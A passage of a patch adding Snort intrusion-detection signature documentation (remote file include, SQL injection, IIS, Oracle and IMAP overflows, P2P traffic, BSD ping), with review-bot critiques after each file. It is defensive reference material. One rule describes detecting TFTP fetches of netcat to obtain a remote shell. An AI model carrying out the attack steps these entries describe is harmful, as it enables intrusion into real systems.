+Cisco IOS processes these packets and under certain circumstances, can 
+be made to incorrectly flag an input interface as being full.
+
+--
+Affected Systems:
+Multiple versions of Cisco IOS.
+
+--
+Attack Scenarios:
+An attacker may send a large number of IP packets using one of the 
+protocols 53, 55, 77 or 103 directly to a router. Exploit code exists.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
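Review bot: Corrective Action in this hunk lists only upgrading and patching, but Detailed Information already gives the ingredients of the standard interim mitigation: the packets must be sent "directly to that device" and use IP protocols 53, 55, 77 and 103, so an access list dropping those four protocols when destined to the router's own addresses should be listed as a workaround for devices that cannot be upgraded at once. Also fix "Expoit" in Ease of Attack, replace "Multiple versions of Cisco IOS" in Affected Systems with the actual version ranges (as written it gives an operator nothing to check), and fill in the empty Additional References with the vendor advisory for this issue.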
--- /dev/null
+++ b/doc/signatures/368.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+368
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Berkeley Systems Development (BSD) host.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running a BSD TCP/IP networking stack such as FreeBSD, NetBSD, or OpenBSD, will contain a unique payload in the message request.  
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS152
+
+--
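Review bot: "Berkeley Systems Development (BSD)" in the Summary is wrong; BSD is the Berkeley Software Distribution, which is also what the FreeBSD, NetBSD and OpenBSD list in Detailed Information refers to. Since the rule keys on the payload that the BSD ping utility sends by default, False Negatives should not read "None known": any sender that changes the echo payload will not match, and, conversely, anyone can replay that payload from a non-BSD host, so Detailed Information should say the payload identifies the tool, not the operating system with certainty. Also "legimately" in False Positives should be "legitimately".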
--- /dev/null
+++ b/doc/signatures/521.txt
@@ -0,0 +1,54 @@
+Rule:
+--
+Sid:
+521
+
+--
+Summary:
+This event is generated when an overly large UDP packet is observed. 
+
+--
+Impact:
+Possible denial of service.  UDP packet payloads are typically smaller than 4000 bytes.  One possible explanation of a payload of greater than 4000 bytes is an attempted denial of service.
+
+--
+Detailed Information:
+UDP payloads are typically smaller than 4000 bytes since the UDP protocol is intended to be used for the transmission of smaller payloads.  When a large payload is observed, it may be a sign or anomalous activity, perhaps an attempted denial of service against the remote host. 
+
+--
+Affected Systems:
+Any system that listens for a UDP service. 
+
+--
+Attack Scenarios:
+An attacker may craft large UDP payloads in an attempt to cause a denial of service against a remote host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+There may be UDP services offered that naturally support large payload sizes.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Allow only known UDP protocols inbound.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS521
+
+--
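Review bot: "may be a sign or anomalous activity" in Detailed Information should be "a sign of anomalous activity". More substantively, the document states the 4000-byte threshold twice but never says what the rule actually compares (UDP payload size or IP total length), which is what an analyst needs in order to tune the case that False Positives describes; state the exact field and threshold. Corrective Action ("Allow only known UDP protocols inbound") does not address the size condition at all; suggest adding that the threshold can be raised or the rule suppressed for the large-datagram services that the False Positives section alludes to.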
--- /dev/null
+++ b/doc/signatures/1441.txt
@@ -0,0 +1,49 @@
+Rule:
+
+Sid:
+1441
+
+Summary:
+This event is generated when a TFTP GET request is made for "nc.exe".  This could be an indication that a remote attacker has compromised a Windows based system and is attempting to move attack tools onto the system.
+
+Impact:
+In normal situations this is a good indication that the host transmitting the request has been compromised by a remote attacker.  If the request was successful it is a clear indication that the host is now under the control of a remote attacker.  Once "nc.exe" is executed on the compromised system a remote attacker will be able to run arbitrary commands with the privilege level of the user that exected "nc.exe"
+
+Detailed Information:
+NetCat (nc.exe) is a widely used Unix and Windows utility that reads and writes data across network connections.  It can be used to redirect an application's input and output across a network and allows remote attackers an easy way to move rootkits and other tools onto a compromised system.  
+
+Currently this rule searches for "nc.exe" in TFTP GET requests.  Many times this rule will detect the first stages of a remote compromise attempt, as many attackers use NetCat to gain a command prompt on Windows based systems.
+
+Affected Systems
+Windows 95
+Windows 98
+Windows NT
+Windows 2000
+
+Attack Scenarios:
+Remote attackers use "nc.exe" to gain a command prompt "cmd.exe" on Windows based systems.  This allows for easy manipulation of the underlying file system, and also creates a simple attack vector for uploading rootkits and tools.
+
+Ease of Attack:
+Simple.  TFTP (Trivial File Transfer Protocol) is a simple method for transfering binary files across the Internet.  It requires minimal skill to use and is easy to operate in a restricted environment.
+
+False Positives:
+This rule was created to catch TFTP GET requests for "nc.exe", if this file name is being used during a legitimate TFTP session this rule will generate a false positive.
+
+False Negatives:
+Any attacker who changes "nc.exe" to another filename will bypass this rule.
+
+Corrrective Action:
+The host generating the request should be investigated for evidence of a compromise.  If it is determined that the system has been compromised the only safe way to recover the system is to format the system drives and re-install the system.
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matthew Watchinski <Matt.Watchinski@sourcefire.com>
+
+Additional References
+
+NetCat the Network Swiss Army Knife - http://www.atstake.com/research/tools/nc110.txt
+  
+
+
+--
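Review bot: this file drops the "--" separators between sections that every other signature document in this patch uses, and "Affected Systems" and "Additional References" lack the trailing colon; bring it in line with the layout the rest of the patch follows. Typos in the same hunk: "Corrrective Action", "exected", "transfering". Affected Systems lists only Windows 95 through 2000, yet nothing in the rule is version specific (it matches the filename "nc.exe" in a TFTP GET), so either say Windows generally or explain the restriction. The False Negatives note is good; it is worth adding that the rule is equally blind to the same file fetched over any protocol other than TFTP.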
--- /dev/null
+++ b/doc/signatures/100000491.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000491
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "DeluxeBB" application running on a webserver. 
+Access to the file "posting.php" using a remote file being passed as the 
+"templatefolder" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "templatefolder" parameter in the "posting.php" script 
+used by the "DeluxeBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DeluxeBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
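Review bot: the third paragraph of Detailed Information and the whole of Attack Scenarios are generic CGI credential-bypass boilerplate that does not describe this rule, which fires on a remote file passed in the "templatefolder" parameter of "posting.php"; replace them with the file-include scenario (attacker supplies a URL in the parameter, the script includes and executes the remote code). Corrective Action could add the usual server-side mitigation for remote file inclusion beside patching, namely disabling remote file inclusion in the PHP configuration (allow_url_include, and allow_url_fopen where the application does not need it). Wording: "ona web server" should be "on a web server" and "an exploitation attempt has been attempted" should be "an exploitation attempt has been made". Formatting: a blank line is missing between the Sid and its "--" separator, and the Affected Systems line runs straight into the next separator.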
--- /dev/null
+++ b/doc/signatures/870.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+870
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
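Review bot: the Summary and Detailed Information in this hunk never say which CGI resource the rule matches; every sentence is generic ("a known vulnerability in a CGI web application", "a CGI application running ona web server"), so an analyst receiving this event cannot tell what was requested or which product is affected. Name the script or path the rule's content match looks for and the application it belongs to in the Summary, and narrow Affected Systems ("All systems running CGI applications") to match. Also "ona" should be "on a", and the last line of the first Detailed Information paragraph runs well past the wrap width used by the rest of the file.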
--- /dev/null
+++ b/doc/signatures/1000.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1000
+
+--
+Summary:
+This event is generated when an attempt is made to access the bdir.htr file.
+
+--
+Impact:
+Information gathering.  This attack can disclose the directory structure on a vulnerable Internet Information Server(IIS).
+
+--
+Detailed Information:
+A vulnerability is exposed if an upgrade to IIS 4.0 is performed without deleting the remote administration scripts from IIS 3.0. Because of changes to the authentication methods between versions 3.0 and 4.0, these scripts can be accessed directly, and without authentication. An attacker can access one of these scripts, bdir.htr, to disclose the
+vulnerable server's directory structure.
+
+
+--
+Affected Systems:
+IIS 4.0 servers that are upgraded from IIS 3.0.
+
+--
+Attack Scenarios:
+An attacker can craft a URL to access the bdir.htr file, which can disclose the directory structures on the vulnerable server.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the bdir.htr file if it is not required.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2280
+
+
+
+--
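Review bot: Corrective Action ("Remove the bdir.htr file if it is not required") is narrower than the problem Detailed Information describes: the issue is that the whole set of IIS 3.0 remote administration scripts is left behind by the upgrade to 4.0 and becomes reachable without authentication, so the advice should be to remove all of those leftover scripts (or the directory they live in), not only bdir.htr, and to restrict remote administration to trusted addresses. Minor: "Internet Information Server(IIS)" needs a space before the parenthesis, and the Detailed Information paragraph has a stray hard line break before "vulnerable server's directory structure".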
--- /dev/null
+++ b/doc/signatures/100000597.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000597
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_create.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_create.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
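Review bot: same problem as in 100000491.txt: the last paragraph of Detailed Information and the Attack Scenarios text describe a credential-validation weakness, not the remote file include via "admin_template_path" in "inv_create.php" that the Summary says the rule detects; replace them with a scenario that matches (attacker passes a URL in admin_template_path, the script includes and executes the remote file). The same wording fixes apply: "ona web server", "has been attempted", and the missing blank line after the Sid and before the Affected Systems separator.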
--- /dev/null
+++ b/doc/signatures/100000690.txt
@@ -0,0 +1,79 @@
+
+
+Rule:
+
+--
+Sid:
+100000690
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "BXCP" application running on a webserver. Access to the 
+file "index.php" with SQL commands being passed may indicate that an 
+exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "index.php" script used by the "BXCP" application 
+running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running BXCP version 0.3.0.4 and prior.
+
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Currently, no patches or workarounds exist.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Jacob <chris.jacob@sourcefire.com>
+
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+http://www.bxcp.com
+
+--
+
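Review bot: the Summary says SQL commands are passed to "index.php" but, unlike the file-include documents in this patch, never names the parameter the rule inspects; an analyst needs it to confirm or tune the event, so name it. Corrective Action ("Currently, no patches or workarounds exist") contradicts Attack Scenarios, which already states the generic remedy (input "correctly sanitized or checked before passing that input to the database"); record that as the workaround, and add parameterised queries and a least-privilege database account for the application. The second Detailed Information paragraph ("it may also be possible ... the attacker may also be able") is a run-on and should be split. The Impact text claims arbitrary code execution without saying how the injection leads to it, and the file starts with two blank lines the other documents do not have.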
--- /dev/null
+++ b/doc/signatures/550.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+550
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+
+--
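Review bot: Detailed Information never says which P2P protocol this rule detects, yet the only reference is the OpenNap/Napster protocol specification; if the rule matches Napster/OpenNap traffic, say so explicitly as 2586.txt does for eDonkey, otherwise the reference is misleading. False Positives "None known" is hard to justify for a protocol-fingerprint rule; at least state whether the match is on a port, a login string or a command token, since that determines what else can trigger it. Corrective Action could add blocking the protocol at the perimeter alongside uninstalling the client.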
--- /dev/null
+++ b/doc/signatures/2586.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2586
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. 
+This may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be configured 
+to share any file on the local machine. In particular this event is
+generated when the p2p client eDonkey is used.
+
+This activity may not only use bandwidth but may also be used to transfer 
+company confidential information to unauthorized hosts external to the 
+protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using an eDonkey p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
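Review bot: Additional References is empty; the eDonkey protocol documentation or the client project page should be cited, as 550.txt cites the OpenNap specification. As with 550.txt, state what the rule matches on (port, handshake bytes or command) so the "None known" False Positives claim can be judged, and consider adding perimeter blocking of the protocol to Corrective Action, since "uninstall any p2p client found" only helps once the host has been identified.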
--- /dev/null
+++ b/doc/signatures/943.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+943
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+In this case an attempt is being made to access the executable file
+fpsvradm.exe from resources external to the protected network.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/resources/documentation/office/2000/all/reskit/en-us/75t4_3.mspx
+
+--
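Review bot: the executable name in Detailed Information, "fpsvradm.exe", looks like a transposition; the FrontPage Server Extensions administration utility is fpsrvadm.exe, so check the spelling against the rule's content match and make the document agree with it, because analysts will search for this exact name. The Summary promises "a known vulnerability" but the body only says the file was requested "from resources external to the protected network"; say which weakness access to this tool exposes (or state that the event is an access attempt, not an exploit), and make Attack Scenarios ("directory traversal ... buffer overflow") specific to that instead of generic.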
--- /dev/null
+++ b/doc/signatures/2776.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2776
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_raw
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
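Review bot: the template left a line break before the full stop in Detailed Information ("drop_priority_raw" / ". This procedure is included in" / "dbms_repcat."); join it into one sentence, and use the fully qualified package name (sys.dbms_repcat, as 2849.txt writes sys.dbms_repcat_utl) so the two documents follow one convention. "Oracle Oracle9i" in Affected Systems duplicates the vendor name. Additional References is empty and should cite the vendor alert covering these overflows. Corrective Action could also suggest revoking EXECUTE on the package from PUBLIC where it is granted and replication is not used, since the text says the attacker only needs to "supply enough data to the procedure".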
--- /dev/null
+++ b/doc/signatures/2849.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2849
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_an_object
+. This procedure is included in
+sys.dbms_repcat_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
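Review bot: same template artefact as in 2776.txt: the line break before ". This procedure is included in" splits the Detailed Information sentence, and "Oracle Oracle9i" in Affected Systems repeats the vendor. Additional References is empty here as well; both dbms_repcat documents should cite the same vendor alert, and Corrective Action should carry the same EXECUTE-revocation workaround for sys.dbms_repcat_utl where that package is granted to PUBLIC and unused.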
--- /dev/null
+++ b/doc/signatures/1768.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+
+1768 
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer in HTTP header field handler of Microsoft Internet Information Server (IIS) versions 4.0, 5.0, and 5.1.
+
+--
+Impact:
+Denial of Service, arbitrary code execution. Full administrative control is possible.
+
+--
+Detailed Information:
+A vulnerability exists in HTTP header process in ASP.DLL , a specially crafted packet sent to this processor will allow an attacker to disrupt the ISS service or run any arbitrary commands with the privileges of the ASP ISAPI extension.
+
+--
+Affected Systems:
+	Microsoft Internet Information Server 4.0 
+	Microsoft Internet Information Services 5.0 
+	Microsoft Internet Information Services 5.1 
+
+--
+Attack Scenarios:
+A remote attacker first probes the version of ISS server then ,could attempt overflow one of the HTTP header field buffers and execute arbitrary code on the system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
+
+CERT:
+http://www.cert.org/advisories/CA-2002-09.html
+
+--
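Review bot: "ISS" appears twice in this hunk (Detailed Information: "disrupt the ISS service"; Attack Scenarios: "version of ISS server") where IIS is meant; as written it names a different vendor. Detailed Information should also say which HTTP header field the rule inspects, rather than "HTTP header process in ASP.DLL", since that is what an analyst will look for in the packet. Attack Scenarios is garbled ("then ,could attempt overflow one of the HTTP header field buffers"); suggest "A remote attacker first probes the server version, then sends an oversized HTTP header field to overflow the buffer and execute arbitrary code." There is also a stray blank line between "Sid:" and "1768" that the other files do not have.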
--- /dev/null
+++ b/doc/signatures/100000346.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000346
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "prepend.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "prepend.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
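Review bot: as with the other remote file include documents in this patch (100000491.txt, 100000597.txt), the last Detailed Information paragraph and the Attack Scenarios are credential-bypass boilerplate unrelated to a remote file passed in "_PX_config[manager_path]" to "prepend.php"; replace them with the file-include scenario. Because the parameter is an array element, the rule presumably matches the literal "_PX_config[manager_path]=" text; say whether URL-encoded brackets are also covered, since that bears directly on the False Negatives section, which currently reads "None known". The hunk also begins with two blank lines the other files lack, and "ona" and "has been attempted" need the same fixes as the sibling documents.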
--- /dev/null
+++ b/doc/signatures/1902.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+1902
+
+--
+Summary:
+This event is generated when a remote attacker sends an IMAP LSUB
+command with a malformed and overly long argument to an internal IMAP
+server port. This may indicate an attempt to exploit a buffer overflow
+vulnerability in the IMAP LSUB command.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
